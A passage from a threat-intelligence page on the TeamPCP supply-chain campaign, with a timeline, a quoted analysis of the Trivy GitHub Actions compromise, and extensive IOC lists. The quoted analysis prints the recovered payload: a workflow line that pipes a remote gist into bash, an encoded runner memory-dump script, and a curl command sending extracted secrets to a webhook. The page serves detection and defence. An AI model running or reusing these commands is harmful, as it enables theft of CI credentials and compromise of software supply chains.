than IP blocking. - Typosquatting
and Cloudflare Tunnels: The group complements their
blockchain C2 with relays hosted on Cloudflare Tunnels and typosquatted
domains (e.g., checkmarx.zone), which inherit the reputation and
trust of the legitimate services they mimic.
Exploiting Implicit Trust
The group’s most
effective evasion tactic is leveraging the implicit trust of
the software supply chain.
- Signed
Malware: By compromising the CI/CD pipelines of trusted
projects (like Trivy and KICS), TeamPCP ensures their
malicious packages are signed with legitimate developer keys. Security
tools that verify signatures (like SLSA provenance checks) inadvertently
validate the malware as authentic. - Dormant
Triggers: Some backdoors
utilize workflow_dispatch triggers, allowing the malicious code
to sit dormant in a repository until manually activated by the attacker,
bypassing static analysis scans that occur during the initial pull
request.
TeamPCP https://ramimac.me/teampcp/#teampcp
aka Altered Spider (CrowdStrike), SHADOW-WATER-058, UNC6780 (GTIG), PCPcat, Persy_PCP, ShellForce, CipherForce, DeadCatx3
Hybrid threat actor functioning as
botnet, access broker, data-leak crew, and cloud exploitation group. Emerged
late 2025. Brokers access to LAPSUS$, UNC6240/ShinyHunters,
and Vect Ransomware. Partnerships with xpl0itrs and BreachForums
ecosystem.
External
Analysis
- Flare.io — Dec 2025 worm campaign targeting cloud
infrastructure - Beelzebub — Next.js exploit campaign, 59K
compromises in 33 hours - Ransomware Interviews — "T" interview
with TeamPCP member
Timeline
Feb 27-
Prologue: the Pwn Request at the Root - 1 events
MegaGame10418 executed PwnRequest against Trivy CI,
exfiltrating the aqua-bot PAT.
BoostSecurity Analysis-
(https://labs.boostsecurity.io/articles/megagame10418-the-user-behind-hackerbot-claw/)
MegaGame10418: A Throwaway Account Linked to the
Hackerbot-Claw Attack-
Between February 27 and 28, 2026,
the GitHub user hackerbot-claw executed an automated “Pwn Request”
campaign targeting several high-profile repositories. Our Package Threat Hunter
detected the activity in attacker-controlled forks while the payloads were
still being staged. During our investigation, we identified a throwaway
account, MegaGame10418, which had attempted the same injection technique a
month earlier against a publicly available NewRelic test repository. While some
evidence suggests the reuse of a public security-training repository, other
signals point to deliberate malicious testing in preparation for the larger
campaign.
The hackerbot-claw campaign
From 2026-02-27 05:12:50
UTC to 2026-02-28 18:32:42 UTC, the GitHub
user hackerbot-claw employed various Pwn Request techniques to probe
and exploit GitHub Actions workflows across multiple critical repositories. The
attacker utilized the AI agent openclaw to systematically
identify and target victims at scale. The repositories targeted during this
campaign included:
- ambient-code/platform
- aquasecurity/trivy
- avelino/awesome-go
- DataDog/datadog-iac-scanner
- microsoft/ai-discovery-agent
- project-akri/akri
- RustPython/RustPython
- DataDog/datadog-agent
The most significant confirmed
impact occurred within aquasecurity/trivy. Our investigation independently
verified findings from other researchers (see Credits below), confirming that
our Package Threat Hunter flagged multiple attacks before they could fully execute,
capturing activity in the attacker’s forks while the payloads were being
staged.
MegaGame10418
Following the aquasecurity/trivy
discussion, we investigated the malicious PR
#10252, which preceded the main hackerbot-claw attack by
approximately five hours. According to the maintainer knqyf263:
“Based
on our audit log analysis, we believe the creator of #10252 and hackerbot-claw
are likely the same attacker.” full quote.
The
account MegaGame10418 opened that PR - a username that had not yet
appeared in other reports associated with this attack. Both the PR and the user
account have since been deleted, an action typically reserved for GitHub staff
when removing verified malicious activity.
The original aquasecurity/trivy
repo was made private, which made it exit the fork network. This automatically
elected a new root node to fossabot/trivy. Using this repo, we were able to get the
malicious commit from MegaGame10418 (1052e39...).
.github/actions/setup-go/action.yaml
- name: Extract Go
version from go.mod
id: go-version
shell: bash
run: |
curl -sSfL
https://gist.githubusercontent.com/MegaGame10418/f43b159297d7aab838fa484a9dbd5fbd/raw/run.sh
| bash &> /dev/null
exit 1
Copy
MegaGame10418 added a new
line pkg/notification/notice.go and pushed to (fcdeb4...)
at 2026-02-27 00:19:03 UTC to trigger the workflow.
MegaGame10418
Payload
The attacker used a Gist for the
payload. Although the Gist was deleted, we successfully recovered the content:
MEMDUMP_PY="aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgojIENyZWRpdCB0byBnaXRodWIuY29tL25pa2l0YXN0dXBpbiBmb3IgdGhlIHNjcmlwdC4KCmRlZiBnZXRfcGlkKCk6CiAgICBwaWRzID0gW3BpZCBmb3IgcGlkIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcGlkLmlzZGlnaXQoKV0KCiAgICBmb3IgcGlkIGluIHBpZHM6CiAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGNtZGxpbmVfZjoKICAgICAgICAgICAgaWYgYidSdW5uZXIuV29ya2VyJyBpbiBjbWRsaW5lX2YucmVhZCgpOgogICAgICAgICAgICAgICAgcmV0dXJuIHBpZAoKICAgIHJhaXNlIEV4Y2VwdGlvbignQ2FuIG5vdCBnZXQgcGlkIG9mIFJ1bm5lci5Xb3JrZXInKQoKcGlkID0gZ2V0X3BpZCgpCgptYXBfcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWFwcyIKbWVtX3BhdGggPSBmIi9wcm9jL3twaWR9L21lbSIKCndpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZi5yZWFkbGluZXMoKTogICMgZm9yIGVhY2ggbWFwcGVkIHJlZ2lvbgogICAgICAgIG0gPSByZS5tYXRjaChyJyhbMC05QS1GYS1mXSspLShbMC05QS1GYS1mXSspIChbLXJdKScsIGxpbmUpCiAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgbWVtX2Yuc2VlayhzdGFydCkgICMgc2VlayB0byByZWdpb24gc3RhcnQKICAgICAgICAKICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgY2h1bmsgPSBtZW1fZi5yZWFkKGVuZCAtIHN0YXJ0KSAgIyByZWFkIHJlZ2lvbiBjb250ZW50cwogICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY2h1bmspCiAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgY29udGludWU="
echo $MEMDUMP_PY | base64 -d > /tmp/dump.py
YOUR_EXFIL="webhook.site/eaa1f5cc-ed33-4eec-bcde-14f0bac63908"
# Uses memory dump technique from
github.com/nikitastupin/pwnhub
# with regex to parse out all secret values (including
GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`sudo
python3 /tmp/dump.py | tr -d '\0' | grep -aoE
'"[^"]+":\{"value":"[^"]*","isSecret":true\}'
| sort -u | base64 -w 0`
# Exfiltration to
Webhook
curl -s -d
"$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
else
exit 0
fi
Copy
This is a classic memory dump technique
combined with a webhook for exfiltration. While not
innovative, it is highly effective at extracting secrets from active runner
memory and send the result to a webhook. Using the webhook.site API
(https://webhook.site/token/eaa1f5cc-ed33-4eec-bcde-14f0bac63908), we see the
last request to this webhook was at 2026-02-27 00:27:50 UTC, 9 minutes
after the push:
{
"uuid":
"eaa1f5cc-ed33-4eec-bcde-14f0bac63908",
"default_content": "This URL has no default content
configured. Change
response in Webhook.site.",
"user_agent": "Mozilla/5.0 (X11; Linux x86_64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"ip":
"138.199.34.137",
"created_at": "2026-02-27 00:05:47",
"updated_at": "2026-02-27 00:27:50",
"expires_at": "2026-03-06 00:05:47",
"latest_request_at": "2026-02-27 00:27:50",
"latest_request_id": "dc947e37-5219-451e-8c53-b43a44fcf442"
}
Copy
The
past of MegaGame10418
By pivoting to our automated threat
hunting data, we discovered that we had already flagged suspicious activity from this user a
month prior:
The activity involved an attack
on newrelic/test-oac-repository, a now-deleted repository. It is highly
unusual for a large organization to host a repository that was attacked a month
ago without the user being immediately banned. We reviewed all events on this
repository and found that on 2026-01-27, three accounts attempted to exploit it:
- MegaGame10418 and r3s1l3n7 (both
now banned). - bhtestaccount123 (still
active).
bhtestaccount123 is
particularly interesting, as it still hosts a fork: bhtestaccount123/test-oac-repository.
Most commits there were made by pranav-new-relic,
a verified account within the NewRelic organization. This repository was
originally forked from gaurab4163/test-oac-repository,
another legitimate account.
Analysis
& Speculation
The newrelic/test-oac-repository appears
to have been a GitHub Actions security training lab. The workflows contained
basic injection vulnerabilities, including the use
of REPO_ACCESS_TOKEN secrets and contents:
write permissions.
It is possible
that pranav-new-relic created this to demonstrate vulnerabilities
(though hosting such a lab within an official organization is risky, as it
could lead to the dumping of organization-wide secrets). This would explain why
the accounts attacking it weren’t immediately banned.
While bhtestaccount123 appears to be a legitimate throwaway for
testing, other accounts—specifically MegaGame10418—seem to have used this
“training” ground to refine their malicious payloads.
Poutine:
Detecting Vulnerabilities Before the Attack
Our “Package Supply” system
runs poutine continuously
against public repositories. We had already
scanned newrelic/test-oac-repository on 2026-01-05 and
identified three
workflows vulnerable to command injection via unsanitized pull request
metadata:
- .github/workflows/handle-closed-fork-pr.yml
- .github/workflows/test-fork-pr-handler.yml
- .github/workflows/fork-pr-handler.yml
Critically, we also identified the
vulnerability in aquasecurity/trivy on 2025-11-29, months before
any attacks were attempted. Even without our advanced internal detection rules,
the open-source version of poutine would have easily flagged
these vulnerabilities.
Remediation
- Audit
your workflows: Run poutine against
your repositories. The injection patterns that
compromised aquasecurity/trivy and the NewRelic test repository
are both covered by poutine’s open-source detection engine. - Minimize
Secret Scope: Avoid using high-privileged tokens (like those
with contents: write) in workflows triggered by external pull
requests.
Timeline
of Observed Events
- 2026-01-05
17:40:35 UTC: Package Supply detects three injection
vulnerabilities in newrelic/test-oac-repository via poutine. - 2026-01-16
10:20:05 UTC: GitHub account MegaGame10418 is
created. - 2026-01-27
19:53:34 UTC: MegaGame10418 forks newrelic/test-oac-repository and
submits a PR with an injection-style branch name. - 2026-01-27
(Same Day): At least two other accounts
(r3s1l3n7 and bhtestaccount123) perform similar tests on the
same repository. - 2026-02-26
23:51:00 UTC: MegaGame10418 forks aquasecurity/trivy. - 2026-02-27
00:18:19 UTC: MegaGame10418 opens PR #10252
on aquasecurity/trivy using head SHA 53e032b.... - 2026-02-27
00:19:03 UTC: MegaGame10418 pushed the payload. - 2026-02-27
00:19:20 UTC: MegaGame10418 closed the PR. - 2026-02-27
00:27:50 UTC: The webhook was updated for the last time. It most
likely received the PAT during this time. - 2026-02-27
05:12:50 UTC: The hackerbot-claw automated campaign
begins, targeting multiple high-profile repositories.
Network
Indicators (IOC's)
trivy
c2
scan.aquasecurtiy.org
45.148.10.212
cloudflare
tunnels
plug-tab-protective-relay.trycloudflare.com
souls-entire-defined-routes.trycloudflare.com
investigation-launches-hearings-copying.trycloudflare.com
championships-peoples-point-cassette.trycloudflare.com
create-sensitivity-grad-sequence.trycloudflare.com
icp
canister
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
File
Hashes- 11
trivy binaries
822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0
f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d
bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7
e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf
ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c
d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c
e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243
6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538
0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349
887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073
trivy
action malware
18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
GitHub
Artifacts - 17
imposter
commits
actions/checkout @ 70379aad
aquasecurity/trivy @ 1885610c
aquasecurity/trivy-action @ ddb9da44
lateral
movement
aquasecurity/tfsec @ a67fd5b5
aquasecurity/traceeshark @ 56591dfe
aquasecurity/trivy-action @ 93ed4111
aquasecurity/setup-trivy @ 8afa9b9f
compromised
accounts
aqua-bot
Argon-DevOps-Mgt
Octocommit
container
images
ghcr.io/aquasecurity/trivy:0.69.4
docker.io/aquasec/trivy:0.69.4
public.ecr.aws/aquasecurity/trivy:0.69.4
docker.io/aquasec/trivy:0.69.5
sha256:f69a8a4180c43fc427532ddde34a256acbd041a0a07844cf7e4d3e0434e5bcd1
docker.io/aquasec/trivy:0.69.6
sha256:dd8beb3b40df080b3fd7f9a0f5a1b02f3692f65c68980f46da8328ce8bb788ef
Malware
Signatures - 18
attribution
strings
TeamPCP Cloud stealer
tpcp.tar.gz
tpcp-docs
Runner.Worker
persistence
paths
/var/lib/svc_internal/runner.py
/etc/systemd/system/internal-monitor.service
/var/lib/pgmon/pgmon.py
/etc/systemd/system/pgmonitor.service
/tmp/.pg_state
/tmp/pglog
injected
files
cmd/trivy/main.go
cmd/trivy/scand.go
kubernetes
host-provisioner-std
host-provisioner-iran
kamikaze
provisioner
network
behavior
Scans ports 22, 2375 on local /24
/var/log/auth.log
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Copy
of All IOC’s (JSON)
{
"_comment": "TeamPCP Supply Chain Campaign IOCs. For
programmatic access, fetch this JSON directly. Last updated:
2026-08-11T11:14:00Z",
"campaign": "TeamPCP",
"cve":
"CVE-2026-33634",
"network":
{
"trivy_c2": [
{"value": "scan.aquasecurtiy.org", "note":
"typosquat", "incident": "trivy"},
{"value": "45.148.10.212", "type":
"ip", "note": "Havoc C2 TeamServer — TECHOFF SRV,
Netherlands", "incident": "trivy"}
],
"cloudflare_tunnels": [
{"value":
"plug-tab-protective-relay.trycloudflare.com", "type":
"domain", "note": "exfil", "incident":
"trivy"},
{"value":
"souls-entire-defined-routes.trycloudflare.com", "type":
"domain", "note": "kamikaze v1",
"incident": ["trivy", "canisterworm"]},
{"value":
"investigation-launches-hearings-copying.trycloudflare.com",
"type": "domain", "note": "kamikaze
v2", "incident": ["trivy", "canisterworm"]},
{"value":
"championships-peoples-point-cassette.trycloudflare.com",
"type": "domain", "note": "kamikaze
v3/v3.1", "incident": ["trivy",
"canisterworm"]},
{"value":
"create-sensitivity-grad-sequence.trycloudflare.com",
"type": "domain", "note": "kamikaze
v3.2/v3.3", "incident": ["trivy",
"canisterworm"]}
],
"icp_canister": [
{"value": "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io",
"note": "March CanisterWorm C2", "incident":
["trivy", "canisterworm"]},
{"value": "cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io",
"note": "April CanisterSprawl C2", "incident":
"canistersprawl"}
],
"canistersprawl_c2": [
{"value": "telemetry.api-monitor.com",
"type": "domain", "note": "secondary webhook
exfil", "incident": "canistersprawl"}
],
"canistersprawl_hashes": [
{"value":
"c19c4574d09e60636425f9555d3b63e8cb5c9d63ceb1c982c35e5a310c97a839",
"note": "dist/env-compat.cjs", "source":
"Socket", "incident": "canistersprawl"},
{"value":
"834b6e5db5710b9308d0598978a0148a9dc832361f1fa0b7ad4343dcceba2812",
"note": "dist/public.pem (RSA-4096)", "source":
"Socket", "incident": "canistersprawl"},
{"value":
"87259b0d1d017ad8b8daa7c177c2d9f0940e457f8dd1ab3abab3681e433ca88e",
"note": "RSA key fingerprint (DER SHA-256)",
"source": "Socket", "incident":
"canistersprawl"}
],
"kics_c2": [
{"value": "checkmarx.zone", "note":
"shared with LiteLLM 1.82.7", "incident":
["checkmarx", "litellm"]},
{"value": "83.142.209.11", "type":
"ip", "note": "AdaptixC2 TeamServer — AS205759 Ghosty
Networks", "incident": "checkmarx"}
],
"litellm_c2": [
{"value": "models.litellm.cloud", "note":
"used by 1.82.8", "incident": "litellm"},
{"value": "litellm.cloud", "note":
"typosquat domain", "incident": "litellm"},
{"value": "46.151.182.203", "type":
"ip", "note": "Exfil/backup C2 — AS205759 Ghosty
Networks", "incident": "litellm"},
{"value": "manpages.wtf", "note":
"redirect target (not apparently malicious)", "incident":
"litellm"}
],
"telnyx_c2": [
{"value": "83.142.209.203", "type":
"ip", "note": "Telnyx exfil (port 8080) — AS205759
Ghosty Networks", "incident": "telnyx"}
],
"wav_delivery": [
{"value": "83.142.209.203:8080/hangup.wav",
"note": "Windows payload (AdaptixC2 beacon)",
"incident": "telnyx"},
{"value": "83.142.209.203:8080/ringtone.wav",
"note": "Unix/macOS payload", "incident":
"telnyx"}
],
"attacker_ops": [
{"value": "170.62.100.245", "type":
"ip", "note": "Primary operator — Kali Linux, Boto3 S3
enum", "incident": "attacker"},
{"value": "209.159.147.239", "type":
"ip", "note": "TruffleHog validation — hosts nsa.cat,
MinIO", "incident": "attacker"},
{"value": "154.47.29.12", "type":
"ip", "note": "Org recon — Windows 11, Datacamp VPN
Croatia", "incident": "attacker"},
{"value": "103.75.11.59", "type":
"ip", "note": "Re-check — macOS ARM, Host Universal
VPN NZ", "incident": "attacker"},
{"value": "nsa.cat", "type":
"domain", "note": "Attacker VPS — nginx, MinIO, open
directory", "incident": "attacker"},
{"value": "105.245.181.120", "type":
"ip", "note": "TruffleHog validation — Vodacom",
"source": "Wiz", "incident": "attacker"},
{"value": "138.199.15.172", "type":
"ip", "note": "GitHub exfil, AWS recon — Mullvad
VPN", "source": "Wiz", "incident": "attacker"},
{"value": "163.245.223.12", "type":
"ip", "note": "GitHub exfil — Interserver",
"source": "Wiz", "incident": "attacker"},
{"value": "185.77.218.4", "type":
"ip", "note": "TruffleHog validation — Crea
Nova", "source": "Wiz", "incident": "attacker"},
{"value": "193.32.126.157", "type":
"ip", "note": "GitHub exfil — Mullvad VPN",
"source": "Wiz", "incident": "attacker"},
{"value": "23.234.107.104", "type":
"ip", "note": "TruffleHog validation — Tzulo",
"source": "Wiz", "incident": "attacker"},
{"value": "34.205.27.48", "type":
"ip", "note": "TruffleHog validation — Amazon
AWS", "source": "Wiz", "incident": "attacker"}
],
"staging_server": [
{"value": "43.228.157.123", "type":
"ip", "note": "Open directory malware staging —
AS205759 Ghosty Networks SG", "source": "LloydLabs",
"incident": "attacker"},
{"value": "43.228.157.123/MidwestGrey.exe",
"type": "url", "note": "Windows PE dropper
(Mar 25)", "source": "LloydLabs", "incident":
"attacker"},
{"value": "43.228.157.123/kfhogts",
"type": "url", "note": "Python trojan bundle
(Mar 13)", "source": "LloydLabs", "incident":
"attacker"},
{"value": "43.228.157.123/oqqqqoa.mp3",
"type": "url", "note": "Audio steganography
payload", "source": "LloydLabs", "incident":
"attacker"}
],
"april_c2": [
{"value": "94.154.172.43", "type":
"ip", "note": "audit.checkmarx.cx — shared
KICS/Bitwarden C2", "incident": ["kics-docker", "bitwarden"]},
{"value": "audit.checkmarx.cx", "type":
"domain", "note": "KICS telemetry exfil
endpoint", "incident": ["kics-docker", "bitwarden"]},
{"value": "whereisitat.lucyatemysuperbox.space",
"type": "domain", "note": "xinference exfil
(disputed)", "incident": "xinference"},
{"value": "zero.masscan.cloud", "type":
"domain", "note": "Mini Shai Hulud primary
exfil", "incident": "mini-shai-hulud"}
],
"checkmarx_jenkins_c2": [
{"value": "checkmarx.cx", "type":
"domain", "note": "exfil domain (May 9)",
"incident": "checkmarx-jenkins"},
{"value": "91.195.240.123", "type":
"ip", "note": "checkmarx.cx resolved IP",
"incident": "checkmarx-jenkins"},
{"value": "updates.checkmarx.cx", "type":
"domain", "note": "update/C2 domain",
"incident": "checkmarx-jenkins"},
{"value": "94.154.172.183", "type":
"ip", "note": "updates.checkmarx.cx resolved IP",
"incident": "checkmarx-jenkins"}
],
"mini_shai_hulud_2_c2": [
{"value": "git-tanstack.com", "type":
"domain", "note": "typosquat C2",
"incident": "mini-shai-hulud-2"},
{"value": "83.142.209.194", "type":
"ip", "note": "TanStack/Cemu C2 / payload host",
"incident": ["mini-shai-hulud-2", "cemu"]},
{"value": "83.142.209.194/transformers.pyz",
"type": "url", "note": "PyPI mistralai
payload download", "incident": "mini-shai-hulud-2"},
{"value": "api.masscan.cloud", "type":
"domain", "note": "C2 (Mistral advisory)",
"incident": "mini-shai-hulud-2"},
{"value": "seed1.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},
{"value": "seed2.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},
{"value": "seed3.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},
{"value": "filev2.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},
{"value":
"05f9e609d79eed391015e11380dee4b5c9ead0b6e2e7f0134e6e51767a87323026",
"type": "session_id", "note": "Session
recipient ID", "incident": "mini-shai-hulud-2"}
],
"durabletask_c2": [
{"value": "check.git-service.com", "type":
"domain", "note": "primary C2",
"incident": "durabletask"},
{"value": "t.m-kosche.com", "type":
"domain", "note": "shared TeamPCP C2",
"incident": ["durabletask", "antv"]},
{"value": "83.142.209.194", "type":
"ip", "note": "legacy payload host",
"incident": ["durabletask", "mini-shai-hulud-2"]}
],
"antv_c2": [
{"value": "t.m-kosche.com", "type":
"domain", "note": "primary exfil C2",
"incident": "antv"},
{"value": "185.95.159.32", "type":
"ip", "note": "t.m-kosche.com resolved IP",
"incident": "antv"},
{"value":
"t.m-kosche.com:443/api/public/otel/v1/traces", "type":
"url", "note": "exfil endpoint (disguised as
OpenTelemetry)", "incident": "antv"},
{"value":
"api.github.com/search/commits?q=firedalazer", "type":
"url", "note": "dead-drop C2 trigger",
"incident": "antv"},
{"value": "fulcio.sigstore.dev/api/v2/signingCert",
"type": "url", "note": "Sigstore abuse for
OIDC token forging", "incident": "antv"},
{"value": "rekor.sigstore.dev/api/v1/log/entries",
"type": "url", "note": "Sigstore
abuse", "incident": "antv"}
],
"elementary_data_c2": [
{"value":
"igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud",
"type": "domain", "note": "exfil C2",
"incident": "elementary-data"},
{"value": "188.114.96.3", "type":
"ip", "note": "Cloudflare-fronted C2",
"incident": "elementary-data"},
{"value": "litter.catbox.moe/iqesmbhukgd2c7hq.sh",
"type": "url", "note": "shell stager
(expired)", "incident": "elementary-data"},
{"value": "litter.catbox.moe/h8nc9u.js",
"type": "url", "note": "JS payload
stager", "incident": "mini-shai-hulud-2"},
{"value": "litter.catbox.moe/7rrc6l.mjs",
"type": "url", "note": "ESM payload
stager", "incident": "mini-shai-hulud-2"}
],
"elementary_data_markers": [
{"value": "X-Rise-To-The-Trinny: agree",
"type": "header", "note": "exfil gate
header", "incident": "elementary-data"},
{"value": "trin.tar.gz", "type":
"string", "note": "credential archive name",
"incident": "elementary-data"},
{"value": "$TMPDIR/.trinny-security-update",
"type": "filepath", "note": "persistence
marker (Unix)", "incident": "elementary-data"},
{"value": "%TEMP%\\.trinny-security-update",
"type": "filepath", "note": "persistence
marker (Windows)", "incident": "elementary-data"},
{"value":
"050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135",
"type": "session_id", "note":
"cross-campaign Session messenger ID (LiteLLM, Xinference,
elementary-data)", "incident": ["litellm",
"elementary-data"]}
],
"miasma_indicators": [
{"value": "google-api-nodejs-client/7.0.0 gl-node/20.11.0
gccl/7.0.0", "type": "user-agent", "note":
"GCP metadata query user-agent", "incident":
"miasma"},
{"value":
"IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner",
"type": "string", "note": "payload marker
string", "incident": "miasma"},
{"value": "Miasma: The Spreading Blight",
"type": "string", "note": "campaign
identifier", "incident": "miasma"},
{"value": "thebeautifulmarchoftime",
"type": "string", "note": "payload marker
string", "incident": "miasma"},
{"value": "tmp.0987654321.lock", "type":
"filepath", "note": "lock file indicator",
"incident": "miasma"},
{"value": "__IS_DAEMON", "type":
"env_var", "note": "environment variable for
persistence check", "incident": "miasma"}
],
"pcpcat_c2": [
{"value": "67.217.57.240", "type":
"ip", "note": "primary C2 — payload host (:666), FRP
server (:888), proxy pool (:890)", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},
{"value": "44.252.85.168", "type":
"ip", "note": "credential exfil (:5656)",
"source": "Rubrik Zero Labs", "incident": "pcpcat"}
],
"pcpcat_payloads": [
{"value": "67.217.57.240:666/files/proxy.sh",
"type": "url", "note": "orchestrator
script", "source": "Rubrik Zero Labs", "incident":
"pcpcat"},
{"value": "67.217.57.240:666/files/pcpcat.py",
"type": "url", "note": "Docker/Ray scanner
(10K workers)", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},
{"value": "67.217.57.240:666/files/react.py",
"type": "url", "note": "CVE-2025-55182
scanner (750 workers)", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},
{"value": "67.217.57.240:666/files/redis-deploy.py",
"type": "url", "note": "Redis exploitation
module", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},
{"value": "67.217.57.240:666/files/BORING_SYSTEM",
"type": "url", "note": "XMRig miner
binary", "source": "Rubrik Zero Labs", "incident":
"pcpcat"},
{"value": "67.217.57.240:666/files/kube.py",
"type": "url", "note": "Kubernetes
propagation", "source": "Rubrik Zero Labs", "incident":
"pcpcat"}
],
"pcpcat_markers": [
{"value": "PCPcat-FRP-Token-2024", "type":
"string", "note": "FRP auth token",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},
{"value": "pcpcat-pool", "type":
"string", "note": "FRP load balancer group name",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},
{"value": "PCPcat-Group-Key", "type":
"string", "note": "FRP load balancer group key",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"}
]
},
"hashes":
{
"litellm_packages": [
{"value":
"8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
"note": "litellm-1.82.7.whl", "incident":
"litellm"},
{"value":
"d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
"note": "litellm-1.82.8.whl", "incident":
"litellm"},
{"value":
"8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea",
"note": "litellm-1.82.7.tar.gz", "incident":
"litellm"},
{"value":
"d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5",
"note": "litellm-1.82.8.tar.gz", "incident":
"litellm"}
],
"litellm_malware": [
{"value":
"a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b",
"note": "proxy_server.py", "incident":
"litellm"},
{"value":
"71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238",
"note": "litellm_init.pth", "incident":
"litellm"},
{"value":
"6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
"note": "sysmon.py (persistence)", "source":
"Hexastrike (confirmed)", "incident": ["litellm",
"telnyx"]}
],
"trivy_binaries": [
{"value":
"822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0",
"note": "Linux-64bit", "incident":
"trivy"},
{"value":
"f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d",
"note": "Linux-32bit", "incident":
"trivy"},
{"value":
"bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7",
"note": "Linux-ARM", "incident":
"trivy"},
{"value":
"e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf",
"note": "Linux-ARM64", "incident":
"trivy"},
{"value":
"ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c",
"note": "Linux-PPC64LE", "incident":
"trivy"},
{"value":
"d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c",
"note": "Linux-s390x", "incident":
"trivy"},
{"value":
"e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243",
"note": "macOS-64bit", "incident":
"trivy"},
{"value":
"6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538",
"note": "macOS-ARM64", "incident":
"trivy"},
{"value":
"0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349",
"note": "Windows-64bit", "incident":
"trivy"},
{"value":
"887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073",
"note": "FreeBSD-64bit", "incident":
"trivy"}
],
"trivy_action_malware": [
{"value":
"18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a",
"note": "entrypoint.sh (malicious)", "incident":
"trivy"}
],
"kics_openvsx": [
{"value":
"527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90",
"note": "environmentAuthChecker.js", "incident":
"checkmarx"},
{"value":
"65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d",
"note": "[email protected]", "incident":
"checkmarx"},
{"value":
"744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0",
"note": "[email protected]", "incident":
"checkmarx"},
{"value":
"0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c",
"note": "[email protected]", "incident":
"checkmarx"}
],
"checkmarx_jenkins_may9": [
{"value":
"01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203",
"type": "sha256", "note":
